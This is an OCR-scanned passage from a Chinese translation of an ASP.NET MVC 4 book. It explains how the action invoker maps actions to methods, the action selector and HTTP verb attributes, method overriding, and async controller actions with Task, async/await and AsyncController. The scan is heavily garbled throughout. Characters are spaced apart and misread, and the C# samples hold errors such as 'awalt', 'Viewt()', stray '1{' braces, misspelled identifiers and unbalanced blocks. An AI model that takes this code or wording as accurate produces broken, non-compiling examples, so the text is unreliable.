本 章 前 面部 分 已 经 多 次 引用 操作 调用 堪 ， 而 没有 对 筷 作 出 任何 解释 。 本 下 将 介绍 
ASPNET MVC 请 求 处 理 链 中 一 个 关键 元 素 的 作用 。 该 元 素 调 用 请 求 调 用 的 操作 ， 它 就 是 
操作 调用 器 。 本 章 前 面 第 一 次 定义 控制 器 时 ， 介 绍 了 路 由 把 URL 映射 到 Controller 类 上 的 
某 一 个 操作 方法 的 工作 原理 。 进 一 步 深 层 地 学 习 ， 会 发 现 其 实 路 由 本 身 没 有 把 任何 内 容 映 
射 到 控制 器 操作 : 它们 只 是 解析 了 输入 的 请 求 ， 并 填充 了 存储 在 当前 RequestContext 中 的 

-个 RouteData 实例 。 

通过 Controller 类 上 的 ActionInvoker 属性 设置 的 ControllerActionInvoker 负责 根据 当前 
请 求 上 下 文 调用 控制 器 上 的 操作 方法 。 该 调用 髓 执行 以 下 任务 : 

e 定位 要 调用 的 操作 方法 。 

e 通过 使 用 模型 绑 定 系统 为 操作 方法 的 参数 获取 值 。 

e 调用 操作 方法 以 及 它 的 所 有 过 滤器 。 

e 调用 操作 方法 返回 的 ActionResult 上 的 ExecuteResult 方 法 .对 于 不 返回 ActionResult 

的 方法 ， 调 用 器 会 创建 一 个 隐 式 操作 结果 (正如 前 一 节 描 述 的 )， 并 调用 该 隐 式 操作 
结果 上 的 ExecuteResult 方法 。 

下 一 节 会 详细 介绍 调用 器 定位 一 个 操作 方法 的 工作 原理 。 

1. 一 个 操作 如 何 被 映射 到 一 个 方法 

ControllerActionInvoker 查看 与 当前 请 求 上 下 文 相关 的 路 由 值 字典 ,以 查找 对 应 于 操作 
键 的 值 。 作 为 一 个 例子 ， 下 面 是 默认 路 由 的 URL 模式 : 

fcCcontrol1lerly7 factionly Tidal 

当 进 入 的 请 求 匹配 该 路 由 时 ， 我 们 根据 该 路 由 填充 一 个 路 由 值 的 字典 (可 以 通过 
RequestContext 访问 )。 例 如 ， 如 条 进入 的 请 求 是 : 

/home/list/123 

路 由 会 把 带 有 操作 键 的 值 列 表 添 加 到 路 由 值 字典 中 。 

此 时 ， 操 作 只 是 从 请 求 的 URL 中 提取 的 一 个 字符 串 ， 而 不 是 一 个 方法 。 提 取 的 字符 
串 表示 应 该 处 理 相 应 请 求 的 操作 名 称 。 尽 管 它 通常 是 由 一 个 方法 表示 ， 但 是 真正 的 操作 是 

-个 抽象 概念 。 对 于 一 个 操作 名 称 可 能 有 多 个 方法 与 其 对 应 。 或 者 它 甚 至 可 能 不 是 一 个 方 
法 而 是 一 个 工作 流 或 其 他 的 一 些 能 够 处 理 操作 的 机 制 。 


操作 调用 需 的 关键 点 是 : 尽管 操作 通 间 上 映射 到 一 个 方法 ， 但 是 调用 需 不 需要 。 本 章 后 
面 讨论 每 个 操作 对 应 两 个 方法 的 异步 操作 时 会 看 到 一 个 这 样 的 例子 。 
操作 方法 选择 


调用 器 一 旦 确定 了 操作 的 名 称 ， 就 会 尝试 找 出 与 该 操作 对 应 的 方法 。 默 认 情 况 下 ， 调 
用 器 使 用 映射 在 派生 自 Controller 类 的 子 类 上 查找 与 当前 操作 同名 (不 区 分 大 小 写 ) 的 公共 


第 15 章 高 级 主题 


方法 。 找 到 的 方法 必须 满足 以 下 条 件 : 
e 必须 没有 定义 NonActionAttribute。 
e 操作 方法 不 能 是 特殊 的 方法 ， 比 如 构造 函数 、 属 性 访问 器 和 事件 访问 器 等 。 
e 最 初 在 Object 上 定义 的 方法 (如 ToString) 或 在 Controller 上 定义 的 方法 (如 Dispose 
或 View) 不 能 是 操作 方法 。 
与 许多 ASPNET MVC 特性 一 样 ， 我 们 根据 应 用 程序 的 特殊 需要 调整 这 些 默 认 行为 。 


ActionNameAttribute 

把 ActionNameAttribute 特性 应 用 于 一 个 方法 允许 我 们 指定 该 方法 处 理 的 操作 。 例 如 ， 
想 要 有 一 个 名 为 View 的 方法 ,然而 , 它 和 Controller 类 中 内 置 的 View 方 法 冲突 , 该 Controller 
类 用 于 返回 ViewResult。 人 解决 这 个 问题 的 一 个 简单 方法 是 编写 如 下 代码 : 

[ActionName ("Vijew")| 

public ActionResult ViewSomething (string 1id) 

{ 


return View(); 

} 

ActionNameAttribute 特性 把 该 操作 的 名 称 重 定义 为 View。 因 此 ， 这 个 方法 可 以 被 调用 
以 响应 请 求 /home/view， 而 不 啊 应 /home/viewsomething。 在 后 一 种 情况 下 ， 对 于 操作 调用 
器 而 言 ， 名 为 ViewSomething 的 操作 方法 不 存在 。 

使 用 ActionNameAttribute 特性 的 一 个 后 果 是 : 如 果 使 用 传统 的 方法 来 定位 操作 对 应 的 
视图 ， 那 么 定位 到 的 视图 应 该 以 该 操作 的 名 称 命名 ， 而 不 是 以 方法 的 名 称 命名 。 在 前 面 的 
示例 中 (假设 这 是 一 个 HomeController 的 方法 ), 我 们 应 该 默认 查找 视图 ~/Views/Home/View. 
cshtml 。 

ActionNameAttribute 特性 对 一 个 操作 方法 来 说 不 是 必需 的 。 这 里 有 一 个 隐 式 的 规则 ， 
如 果 不 使 用 该 特性 的 话 ， 操 作 方 法 的 名 称 就 是 操作 的 名 称 。 


ActionSelectorAttribute 

现在 我 们 尚未 完成 操作 匹配 到 方法 的 过 程 ,一 旦 确定 了 匹配 当前 操作 名 称 的 Controller 
类 上 的 所 有 方法 ,我 们 就 可 以 通过 但 看 列表 中 应 用 ActionSelectorAttribute 特性 的 方法 的 所 
有 实例 来 进一步 削减 清单 。 

ActionSelectorAttribute 特性 是 一 个 抽象 基 类 ， 它 对 操作 方法 可 以 啊 应 的 请 求 提供 了 细 
粒度 的 控制 。 该 特性 的 API 中 只 包含 一 个 方法 : 

public abstract class ActionSelectorAttribute : Attribute 


{ 
public abstract bool IsValidForRequest (ControllercContext controllerContext, 
MethodInfo methodIlinfo); 
} 


此 时 ， 调 用 右 就 在 列表 中 得 找 任何 包含 该 特性 的 子 特性 的 方法 ， 并 调用 每 一 个 子 特性 
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的 ValidForRequest 方法 。 如 果 任 何 一 个 特性 返回 了 false， 那 么 应 用 了 该 特性 的 方法 将 从 
当前 请 求 的 潜在 操作 方法 列表 中 移 除 。 

最 后 ， 列 表 中 应 该 剩余 一 个 方法 让 调用 器 调用 。 如 果 列 表 中 剩余 多 个 方法 来 处 理 当 前 
请 求 ， 调 用 器 就 会 抛 出 一 个 异常 ， 指 示 方 法 的 调用 存在 二 义 性 。 如 果 没 有 方法 可 以 处 理 该 
请 求 ， 调 用 器 就 会 调用 控制 费 的 HandleUnknownAction 方法 。 

ASPNET MVC 框架 包含 了 该 基本 特性 的 两 个 实现 版 本 : AcceptVerbsAttribute 和 
NonActionAttribute 。 


AcceptVerbsAttribute 

AcceptVerbsAttribute 是 ActionSelectorAttribute 的 具体 实现 ， 它 使 用 当前 HTTP 请 求 的 
HTTP 方法 (动词 ) 来 决定 一 个 方法 是 否 能 够 处 理 当 前 请 求 的 操作 , 从 而 允许 我 们 拥有 方法 重 
载 ， 但 这 些 重 载 方法 是 能 够 啊 应 不 同 HITP 动词 的 操作 。 

MVC 使 用 [HttpGet]、[HttpPost]|、[HttpDelete]、[HttpPut|] 和 [HttpHead] 特 性 为 HITP 方 
法 限制 提供 了 更 加 简洁 的 语法 。 这 些 是 以 前 的 [AcceptVerbs(HttpVerbs.Get)]、[AcceptVerbs 
(Http-Verbs.Posb]、[AcceptVerbs(HttpVerbs.Delete)]、[AcceptVerbs(HttpVerbs.Pub] 和 [AcceptVerbs 
(HttpVerbs.Head)] 特 性 的 别名 ， 使 得 这 些 特性 更 便于 输入 和 阅读 。 

例如 , 我 们 想 要 两 个 Edit 方法 版 本 : 一 个 用 来 演 染 编辑 表单 ; 另外 一 个 当 提 交 表 单 时 ， 
处 理 相 应 的 请 求 : 

[HttpGet] 

public ActionResult Edit (string id) 


{ 


return Viewt(); 


} 


[HttpPost | 

public ActionResult Edit(string id, FormCollection form) 

2 the item and redirect.. 

} 

当 一 个 请 求 /home/edit 的 POST 请 求 到 达 时 , 操作 调用 器 创建 一 个 匹配 edit 操作 名 称 的 
所 有 控制 器 方法 的 列表 。 在 本 例 中 ， 列 表 最 终 会 得 有 2 个 方法 。 随 后 ， 调 用 器 查看 所 有 应 
用 到 每 个 方法 的 ActionSelectorAttribute 实例 ， 并 调用 它 的 IsValidForRequest 方法 。 如 果 某 
个 方法 的 特性 返回 tue， 该 方法 就 会 被 认为 对 当前 操作 是 有 效 的 。 

例如 , 在 本 例 中 , 当 询 问 第 一 个 方法 是 否 可 以 处 理 POST 请 求 时 , 因为 它 只 能 处 理 GET 
请 求 ， 所 以 它 将 用 false 啊 应 。 由 于 第 二 个 方法 可 以 处 理 POST 请 求 ， 因 此 ， 它 会 用 true 
啊 应 ， 它 也 正 是 选择 用 来 处 理 该 操作 的 方法 。 

如 果 没 有 发 现 满足 这 些 条 件 的 方法 ， 调 用 器 就 会 调用 控制 器 上 的 HandleUnknownAction 
方法 来 提供 缺失 操作 的 名 称 。 如 果 发 现 有 多 个 操作 方法 满足 这 些 条 件 ， 框 架 就 会 抛 出 一 个 
InvalidOperationException 并 第 。 
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模拟 RESTful 动词 

大 部 分 浏览 器 在 正常 浏览 网 页 期 间 只 文 持 两 个 HITP 动词 :GET 和 POST。 然而 ,REST 
架构 风格 可 以 利用 一 些 额 外 的 标准 动词 : DELETE、HEAD 和 PUT。ASPNET MVC 允许 
我 们 通过 Html.HttpMethodOverride 方法 模拟 这 些 动词 ,该 方法 采用 一 个 参数 来 指示 一 个 标 
准 的 HTTP 动词 (DELETE、GET、HEAD、POST 和 PUT)。 在 内 部 ， 这 通过 发 送 一 个 
X-HTTP-Method-Override 表单 字段 中 的 动词 来 实现 。 

HttpMethodOverride 的 行为 由 [AcceptVerbs] 特 性 和 新 的 短 动词 特性 来 补充 : 

® HttpPostAttribute 

® HttpPutAttribute 

e HttpGetAttribute 

se HttpDeleteAttribute 

e HttpHeadAttribute 

虽然 HITP 的 重 写 方法 只 能 在 当真 实 的 请 求 是 POST 请 求 时 使 用 ， 但 是 重 写 值 也 可 以 
在 HITP 头 或 查询 字符 串 值 中 以 名 称 / 值 对 的 形式 指定 。 


有 关 重 写 HTTP 动词 的 更 多 信息 


尽管 通过 X-HTTP-Method-Override 重 写 HTTP 动词 不 是 官方 标准 , 但 是 它 已 经 变 成 一 


个 普遍 使 用 的 约定 。 它 首先 由 Google 公司 在 2006 年 作为 Google 数据 协议 (Google Data 
Protocol]) 的 一 部 分 引入 (http://code.google.com/apis/edata/docs/2.0/basics.html)， 截 止 到 现在 ， 
它 已 经 在 各 种 RESTful Web API 和 Web 框架 中 实现 。Ruby on Rails 也 遵循 同样 的 模式 ， 但 
不 同 之 处 在 于 它 使 用 的 是 _ method 表单 字段 ， 而 不 是 X-HTTP-Method-Override。 

MVC 只 人 允许 履 靖 POST 请 求 。 框架 首先 从 HTTP 头 部 查找 窗 盖 的 动词 , 然后 在 传递 的 
值 中 查找 ， 最 后 从 查询 字符 串 值 中 查找 。 


2. 调用 操作 


接 下 来 , 调用 器 使 用 模型 绑 定 器 (第 4 章 4.4 节 已 详细 介绍 ) 为 操作 方法 的 每 一 个 参数 映 
射 值 ， 然 后 调用 操作 方法 本 身 的 内 容 。 此 时 ， 调 用 器 创建 一 个 与 当前 操作 方法 相关 的 过 滤 
需 列 表 ， 并 按照 正确 的 顺序 调用 过 滤 右 和 操作 方法 。 想 了 解 更 多 的 信息 ， 请 参阅 14.3.2 市 
的 “操作 过 滤器 ”小 节 。 


15.7.6 ”使 用 异步 控制 器 操作 


ASPNET MVC 2 及 其 后 续 版 本 包含 了 对 异步 请 求 管道 的 完全 文 持 。 这 个 请 求 管道 的 作 
用 是 允许 Web 服务 器 处 理 长 时 间 运 行 的 请 求 一 一 比如 , 那些 花费 大 量 时 间 等 待 网 络 或 数据 
库 操 作 完 成 的 请 求 仍 能 保持 对 其 他 请 求 的 啊 应 。 就 这 一 点 而 言 ， 异 步 代 码 是 更 加 高 效 的 服 
务 请 求 ， 而 不 是 快速 地 服务 一 个 单独 的 请 求 。 

虽然 很 强大 , 但 在 MVC 4 之 前 编写 异步 控制 器 非常 困难 。MVC 4 通过 利用 最 近 的 .NET 
Framework 新 特征 ， 简 化 了 这 一 过 程 : 
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e .NET 4 引入 了 一 个 新 的 任务 并 行 库 (Task Parallel Library) 来 简化 在 NET 平 台 上 开发 
并 行 和 并 发 程序 的 工作 。 任 务 并 行 库 包 含 一 个 新 类 型 一 一 Task 一 一 来 代表 异步 操 
作 。MVC 通过 允许 我 们 在 操作 方法 中 返回 Task<ActionResult> 来 文 持 这 一 功能 。 

e .NET 4.5 通过 两 个 新 关键 字 一 一 async 和 await 一 一 进一步 简化 了 异步 编程 。async 
修饰 符 告知 编译 器 包含 异步 方法 和 lambda 表达 式 的 方法 是 异步 的 ， 这 些 方法 往往 
都 包含 一 个 或 多 个 需要 长 期 运行 的 操作 。 在 异步 方法 上 使 用 await 关键 字 表 示 方 法 
应 该 被 挂 起 ， 直 到 完成 等 待 的 任务 。 

e NET 4 并 行 任务 库 和 .NET 4.5 的 async 和 await 关键 字 的 结合 被 称 为 基于 任务 的 异 
步 模式 ( Task-based Asynchronous Pattern) 或 TAP。 相 对 于 MVC 2 和 3 中 的 方案 ， 
使 用 MVC 4 中 的 TAP 编写 异 步 控 制 帮 非常 便 单 .本 节 主 要 使 用 MVC 4 中 基于 .NET 
4.5 的 TAP， 最 后 给 仍 使 用 MVC 2 和 3 的 开发 人 员 提 出 一 些 建 议 。 

要 理解 异步 和 同步 ASPNET 代码 之 间 的 区 别 ， 必 须 首先 理解 Web 服务 器 是 如 何 处 理 

请 求 的 。IIS 维护 了 一 个 用 来 服务 请 求 的 空闲 线程 的 集合 (线程 池 )。 当 一 个 请 求 进入 时 ， 线 


程 池 中 的 一 个 线程 被 调度 来 处 理 进入 的 请 求 。 当 一 个 线程 正在 处 理 一 个 请 求 时 ， 它 就 不 能 
用 来 处 理 其 他 任何 请 求 , 直到 它 完成 第 一 个 请 求 的 处 理 。IIS 同时 服务 多 线程 的 能 力 是 基于 


一 个 假设 : 即 ， 线 程 池 中 有 衬 闲 的 线程 来 处 理 进 入 的 请 求 。 

现在 考虑 一 个 操作 ， 该 操作 将 网 络 调 用 作为 目 己 执行 的 一 部 分 ， 并 且 网 络 调 用 需要 花 
费 2 秒 钟 才 能 够 守成。 从 网 站 访问 者 的 角度 来 看 ， 服 务 器 大 约 需要 人 花费 2 秒 钟 的 时 间 啊 应 
他 或 她 的 请 求 ( 如 果 只 考虑 Web 服务 髓 本 身 的 开销 的 话 )。 在 同步 世界 里 ， 处 理 该 请 求 的 线 
程 会 被 阻塞 2 秒 钟 ， 以 完成 网 络 调 用 。 也 即 ， 由 于 该 线程 正在 等 竺 网 络 调用 完成 ， 因 此 ， 
理 第 一 个 请 求 ， 因 此 也 不 能 执行 其 
他 请 求 的 有 用 任务 。 这 种 情形 下 的 线程 被 称 为 阻塞 线程 (blocked thread)。 通 常情 况 下 这 不 
是 问题 ， 因 为 线程 池 足 够 大 来 应 对 这 种 应 用 场合 。 然 而 ， 在 处 理 多 个 并 发 请 求 的 大 型 应 用 
程序 中 ， 这 可 能 会 因为 需要 等 待 数据 而 阻 寄 许 多 线程 ， 从 而 导致 没有 线程 池 中 没有 足够 的 
宇 闲 线程 来 调度 服务 新 进入 的 请 求 。 这 种 情形 被 称 为 线程 饥饿 (thread starvation)， 它 会 严重 
影响 网 站 的 性 能 。 如 图 15-17 所 示 。 


异步 请 求 时 间 线 


15-17 
在 一 个 异步 管道 中 ,线程 不 会 因 等 竺 数据 而 阻塞 。 当 一 个 长 时 间 运 行 的 应 用 程序 (比如 
网 络 调用 ) 开 始 时 ， 操 作 在 等 待 数据 期 间 会 目 动 放弃 对 处理 线程 的 控制 。 从 本 质 上 讲 ， 操作 
告诉 线程 ,“ 在 我 能 继续 之 前 需要 花费 一 段 时 间 ,， 所 以 现在 不 用 费劲 等 看 我 。 当 我 需要 的 数 
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据 能 够 获取 时 ， 我 会 通知 IS "。 该 线程 然后 返回 到 线程 地， 以 便 可 以 继续 处 理 必 一 个 请 求 ， 
从 本 质 上 说 ， 当 等 竺 数据 时 ， 当 前 请 求 是 暂停 的 。 重 要 的 是 ， 当 一 个 请 求 处 于 这 种 状态 时 ， 
它 将 被 分 配给 线程 池 中 的 任何 空闲 线程 ， 历 以 它 不 会 阻塞 将 被 处 理 的 其 他 请 求 。 当 该 操作 
的 数据 变 得 可 获取 时 , 网 络 请 求 完 成 事件 会 通知 IIS, 因此 线程 池 中 的 一 个 空闲 线程 会 被 调 
度 继续 处 理 该 请 求 。 继 续 处 理 该 请 求 的 线程 可 能 是 ， 也 可 能 不 是 先前 处 理 该 请 求 的 线程 ， 
但 是 这 个 不 必 开发 人 员 担心 ， 它 是 由 管道 负责 的 ， 如 图 15-18 所 示 。 
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请 注意 ， 在 上 面 的 示例 中 ， 最 终 用 户 在 他 发 送 请 求 和 接受 到 服务 器 的 响应 之 间 看 到 的 
仍 是 一 个 2 秒 钟 的 延迟 。 这 也 是 前 面 所 讲 的 异步 主要 是 高 效率 而 不 是 提供 一 个 单独 请 求 的 
响应 速度 的 意义 。 尽 管 异步 花费 了 与 同步 一 样 的 时 间 响 应 用 户 请 求 ， 但 在 异步 管道 中 ， 服 
务 器 不 会 在 等 待 完成 第 一 个 请 求 时 而 阻塞 其 他 有 用 的 任务 的 执行 。 


1. 同步 与 异步 管道 的 选择 


以 下 是 决定 使 用 同步 还 是 异步 管道 的 一 些 指导 原则 。 注 意 ， 这 些 只 是 指导 原则 ， 还 要 
根据 每 个 应 用 程序 具体 的 要 求 来 选择 。 

使 用 同步 管道 的 指导 原则 如 下 : 

e 操作 简单 或 者 能 在 短 时 间 内 执行 完毕 。 

e 简单 性 和 可 测试 性 是 重要 的 。 

e 操作 是 CPU 密集 型 ， 而 非 IO 密集 型 。 

使 用 异步 管道 的 指导 原则 如 下 : 

e 测试 结果 表明 阻塞 操作 是 站 点 性 能 的 瓶颈 。 

e 并 行 性 比 代 码 简单 更 重要 。 

e 操作 是 IO 密集 型 ， 而 非 CPU 密集 型 。 

因为 异步 管道 比 同步 管道 有 更 多 的 基础 结构 和 开销 ， 所 以 异步 代码 比 同步 代码 更 难 测 
试 。 测 试 异步 代码 需要 模拟 更 多 的 基础 结构 ， 而 且 也 需要 考虑 代码 可 以 按照 不 同 的 顺序 执 
行 。 最后, 一 个 CPU 密集 型 的 操作 可 能 真 的 不 利于 转换 为 一 个 异步 操作 ， 因 为 这 样 会 增加 
一 个 开始 可 能 不 会 阻塞 的 操作 的 开销 。 特 别 地 ， 这 意味 着 在 ThreadPool.QueueUserWorkItem() 
方法 中 执行 CPU 密集 型 操作 的 代码 不 利于 使 用 异步 管道 。 
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2. 编写 异步 操作 方法 


使 用 MVC 4 中 的 新 TAP 模型 编 与 的 异步 操作 与 标准 的 (同步 ) 操 作 非 常 相似。 下 面 是 
把 一 个 操作 转换 为 一 个 异步 操作 的 一 些 要 求 : 
e 操作 方法 必须 使 用 async 修饰 符 标记 为 异步 。 
e 操作 必须 返回 Task 或 Task<ActionResult>。 
e 方法 中 的 任何 异步 操作 使 用 await 关键 字 挂 起 操作 ， 直 到 调用 完成 。 
例如 , 考虑 一 个 为 给 定 区 域 显示 新 闻 的 门户 网 站 。 在 这 个 例子 中 ,新 闻 通 过 GetNews0 
方法 获取 ， 而 GetNews(0 方 法 中 包含 了 一 个 需要 长 时 间 运 行 的 网 络 调用 。 一 个 典型 的 同步 
操作 如 下 : 
public class PortalController : Controller { 
public ActionResult News (string city) |{ 
NewsService newsService = new NewsService(); 
NewsModel news = newsService.GetNews (city); 
return View (news); 


} 
} 


下 和 耐 是 上 和 耐 同步 操作 转换 为 异步 操作 的 代码 : 


PubLlic class PortalController : Controller | 
public async Task<ActionResult> News (string city) 1 
NewsService newSsServiCce = new NewsService()}); 
NewsModel news = await newsService.GetNews (citvy); 
return View (news); 
} 
} 


正如 前 面 描述 的 ， 我 们 只 是 做 了 三 处 改动 : 为 操作 添加 async 修饰 符 ， 返回 
Task<ActionResult>， 并 在 需要 长 时 间 运 行 的 服务 调用 前 添加 await。 


何 时 只 返回 任务 ? 


我 们 可 能 极 想 知道 MVC 4 为 什么 支持 返回 Task 和 Task<ActionResult> 。 不 返回 任何 内 


容 ， 会 怎样 呢 ? 

事实 证 明 ， 在 需要 长 时 间 运 行 的 服务 操作 中 ， 这 是 非常 有 用 的 。 例 如 ， 我 们 可 能 有 一 
个 需要 长 时 间 运 行 的 服务 操作 ， 比 如 发 送 大 量 的 电子 邮件 ， 或 者 构建 一 个 大 型 报告 。 在 此 
类 情况 下 ， 没 有 任何 内 容 返回 ， 没 有 调用 者 监听 。 返 回 Task 与 在 同步 操作 中 返回 void 一 
样 ， 两 者 都 被 转换 为 一 个 EmptyResult 啊 应 ， 表 示 没 有 发 送 啊 应 。 


3. 执行 多 个 并 行 操作 


上 面 示例 代码 不 会 比 一 个 标准 同步 操作 执行 速度 快 多 少 ， 它 只 是 允许 高 效 地 利用 服务 
需 资 源 (正如 本 节 开 始 部 分 解释 的 )。 当 一 个 操作 想 同 时 执行 多 个 异步 操作 时 ， 有 天 步 代码 的 
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优势 才能 发 挥 出 来 。 例 如 ， 一 个 典型 门户 网 站 不 仅 需 要 显示 新 闻 ， 也 需要 显示 体育 、 大 气 
和 股票 等 其 他 信息 。 显 示 这 些 信 息 的 操作 方法 的 同步 版 本 可 能 实现 形式 如 下 : 


Public class PortalController : Controller | 
public ActionResult Index(string city) 1 
NewsService newsService = new NewsService(); 
WeatherService weatherService = new WeatherService(); 
SportsService sportsService = new SportsService (}); 


PortalViewModel model = new PortalViewModel 1{ 
News = newsService.GetNews (city), 
Weather = weatherservice.GetWeather (city), 
Sports = sportsService.GetScores (cityvy) 

}; 


return Viewl(model); 
} 


注意 ， 上 面 的 调用 是 顺序 执行 的 ， 所 以 啊 应 用 户 所 需 的 时 间 等 于 所 有 这 些 单个 调用 所 
需 时 间 的 总 和 。 如 果 调 用 的 时 间 分 别 是 200ms、300ms、400ms， 然 后 整个 操作 的 执行 时 间 
就 是 900ms( 加 上 一 些微 不 足 道 的 开销 )。 
同样 ， 该 操作 的 异步 版 本 采取 下 面 的 形式 : 
Public class PortalController : Controller | 
public async Task<ActionResult> Index (string city) 1 
NewsService newsService = new NewsService(); 


WeatherService weatherService = new WeatherServicel(); 
SportsService sportsService = new SportsService (}); 


Var newsTask = newsService.GetNewsAsync (city),;} 
Var weatherTask = weathersService.GetWeatherAsync (city); 
var SportsTask = sportsService.GetScoresAsync (city),; 


awalt Task.WhenAll (newsTask, weatherTask, sportsTask); 


PortalViewModel model = new PortalViewModel 1{ 
News = newsTask.Result, 
Weather = weatherTask.Result, 
Sports = sportsTask.Result 

}; 


return Viewl(model); 
上 


注意 ， 异 步 代 码 中 的 所 有 操作 是 并 行 执行 的 ， 因 此 ， 啊 应 用 户 需 要 的 时 间 等 于 最 长 的 
单个 调用 时 间 。 如 果 调 用 的 时 间 分 别 是 200ms、300ms 和 400ms， 然 后 整个 操作 的 执行 时 
间 就 是 400ms( 加 上 一 些微 不 足 道 的 开销 )。 
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使 用 TASK.WHENALL 调用 并 行 任务 
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一 个 服务 调用 前 添加 await 关键 字 融 能 使 这 些 服务 并 行 执 行 ， 其 实 ， 事 实 并 非 如 此 。 尽 管 
直到 长 时 间 调 用 完成 后 ，await 才能 释放 线程 ， 但 是 如 果 第 一 个 调用 不 完成 ， 第 二 个 await 
调用 就 不 会 开始 执行 。Task.WhenAll 会 并 行 地 执行 所 有 任务 ， 并 在 所 有 任务 完成 后 返回 。 


上 面 两 个 示例 中 ,访问 操作 的 URL 都 是 /Portal/Index?city=Seattle( 或 /Portal?city=Seattle， 
使 用 默认 的 路 由 )， 而 视图 页 面 的 名 称 也 都 是 mdex.cshtml( 因 为 操作 名 称 是 Index)。 

这 是 一 个 典型 例子 。 在 这 个 例子 中 ， 从 最 终 用 户 的 角度 来 讲 ， 使 用 的 async 关键 字 不 
仅 高 效 ， 而 且 性 能 也 非常 好 。 

4. MVC 2 和 3 使 用 AsyncController 


基于 任务 的 异步 模式 要 求 程 序 在 .NET 4.5 平台 上 使 用 MVC 4 开发 。 如 果 需 要 在 使 用 
MVC 2 或 3 的 应 用 程序 中 添加 异步 操作 , 我 们 可 以 利用 AsyncController 基 类 .。 与 Controller 
类 型 作为 同步 控制 器 基 类 的 方式 一 样 ，AsyncController 类 型 是 异步 控制 器 的 基 类 。 使 用 
AsyncController 把 一 个 同步 操作 转换 为 异步 操作 ， 需 要 满足 以 下 要 求 : 

(1) 继承 基 类 AsyncController， 而 不 要 继承 Controller。 继 承 AsyncController 的 控制 妖 
可 以 使 ASPNET 处 理 异步 请 求 ， 但 它们 也 可 以 为 同步 操作 方法 提供 服务 。 

(2) 为 操作 创建 两 个 方法 .初始 化 异步 处 理 的 方法 名 称 必 须 由 操作 名 称 和 后 级 “Async” 
组 成 。 与 此 类 似 ， 当 异步 处 理 完 成 时 调用 方法 (回调 方法 ) 的 名 称 必 须 由 操作 名 称 和 后 级 

“Completed” 组 成 。 在 前 面 的 例子 中 ，News 方法 就 会 有 两 个 方法 : NewsAsync 和 News- 
Completed 。 

NewsAsyne 方法 返回 void( 在 Visual Basic 中 表示 空 值 )。NewsCompleted 方法 返回 一 个 
ActionResult 实例 。 尽 管 操 作 由 两 个 方法 组 成 ， 但 与 同步 操作 方法 一 样 ， 都 是 使 用 同样 的 
URL 访问 操作 ， 例 如 ，Portal/News?city=Seattle。 像 RedirectToAction 和 RenderAction 这 样 
的 方法 也 引用 操作 方法 News， 而 不 是 NewsAsync。 

传递 给 NewsAsync 方法 的 参数 使 用 正音 的 参数 绑 定 机 制 。 传 递 给 NewsCompleted 的 参 
数 使 用 参数 字典 (Parameters dictionary)。 

(3) 用 异步 操作 方法 中 的 异步 调用 替换 原来 ActionResult 方法 中 的 同步 调用 。 在 上 面 的 
例子 中 ， 使 用 对 newsService.GetHeadlinesAsync 的 调用 替换 对 newsService.GetHeadlines 的 
调用 。 

考 上 处 我 们 原来 的 同步 控制 器 操作 , 使 用 单一 服务 调用 一 个 GetNews0 方 法 ,而 GetNewsO 
方法 中 包含 了 一 个 需要 长 时 间 运 行 的 网 络 调用 : 

public class PortalController : Controller { 

public ActionResult News (string city) I 


NewsService newsService = new NewsService(); 
NewsModel news = newsService.GetNews (city); 
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return View (news).; 


} 


下 面 是 使 用 基 类 AsyncController 实现 的 异步 操作 : 


public class PortalController : AsyncController 1{ 
public void NewsAsync (string city) 1{ 
AsyncManager.OutstandingOperations.Increment () ; 
NewsService newsService = new NewsService(); 


NewsService.GetNewsCompleted += (sender, ee}) => 1 
AsyncManager.Parameters|["news"|] = e.News; 
AsyncManager.OutstandingOoperations.Decrement () ; 

}; 

NewSsService.GetNewsAsync (city); 


} 


public ActionResult NewsCompleted (NewsModel news) 1 
return View (news); 

, } 

这 里 需要 注意 以 下 模式 : 

e 异步 控制 器 的 基 类 是 AsyncController， 而 不 是 Controller， 这 告诉 MVC 管道 允许 异 
步 请 求 。 

e 这 里 不 是 一 个 单一 的 News0O 操作 方法 ， 而 是 两 个 方法 NewsAsyncO 和 
NewsCompleted(), 其 中 第 二 个 方法 返回 一 个 ActionResult 对 象 。 这 两 个 方法 在 逻辑 
上 被 看 成 一 个 操作 方法 News, 因此 , 使 用 同步 操作 一 样 的 URL 访问 : /Portal/News? 
city=Seattle。 

e 注意 传递 给 每 个 方法 的 参数 。 传 递 给 NewsAsync0) 方 法 的 参数 使 用 正 第 的 参数 绑 定 
机 人 制 提供 ， 而 传递 给 NewCompleted0 方 法 的 参数 使 用 AsyncManager.Parameters 字 
典 提供 。NewsAsync0 方 法 使 用 的 NewsService 是 一 个 使 用 基于 事件 异步 模式 服务 
的 例子 (http://msdn.microsoft.com/en-us/library/wewwczdw.aspx)。 

e 使 用 AsyncManager.OutstandingOperations 通知 MVC 管道 等 待 完 成 的 操作 数量 。 这 
是 必需 的 ， 否 则 ，MVC 就 无 法 知道 操作 方法 开始 了 什么 操作 ， 也 不 知道 这 些 操 作 
什么 时 候 完 成 。 当 统计 等 竺 完成 操作 数量 的 计数 器 降 为 去 时 ，MVC 管道 束 通 过 调 
用 NewsCompleted 方法 完成 了 整体 的 异步 操作 。 

同样 ， 前 面 我 们 第 二 个 例子 中 调用 了 多 个 需要 长 时 间 运 行 的 服务 ， 它 的 并 行 异步 版 本 

如 下 所 示 : 


public class PortalController : AsyncController { 
public void IndexAsync (string city) { 
AsyncManager.OutstandingOperations.J1Increment (3); 


407 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


NewsService newsService = new NewWSsSerVlLcCe () ; 

NewsService.GetNewsCompleted += (sender, e) => 1 
AsyncManager.Parameters|["news"|] = e.News; 
AsyncManager.OutstandingOoperations.Decrement () : 


| 


NewsService.GetNewsAsync (city); 


WeatherService weatherService = new WeatherService(); 
weathersService.GetWeatherCcompleted += (sender, e) => | 
AsyncManager.Parameters|["weather"|] = e.Weather; 
AsyncManager.OutstandingOoperations.Decrement ();} 


}s 


weatherSservice.GetWeatherAsync (city); 


SportsService sportsService = new SportsService (}); 
sportsService.GetScoresCompleted += (sender, e) => 1{| 
AsyncManager.Parameters|["sports"| = e.Scores;} 
AsyncManager.Outstandingoperations.Decrement () : 


1 


SportsModel sportsModel = sportsService.GetScoresAsync (city); 


public ActionResult IndexCompleted {NewsModel news, 
WeatherModel weather, SportsModel sports) 1{ 


PortalViewModel model = new PortalViewModel 1{ 
News = news, 
Weather = weather., 
Sports = sports 

}; 


return Viewl(model); 
} 


好 吧 ， 笔 者 承认 : 上 面 笔者 展示 基于 AsyncController 异步 操作 代码 的 部 分 原因 ， 是 想 
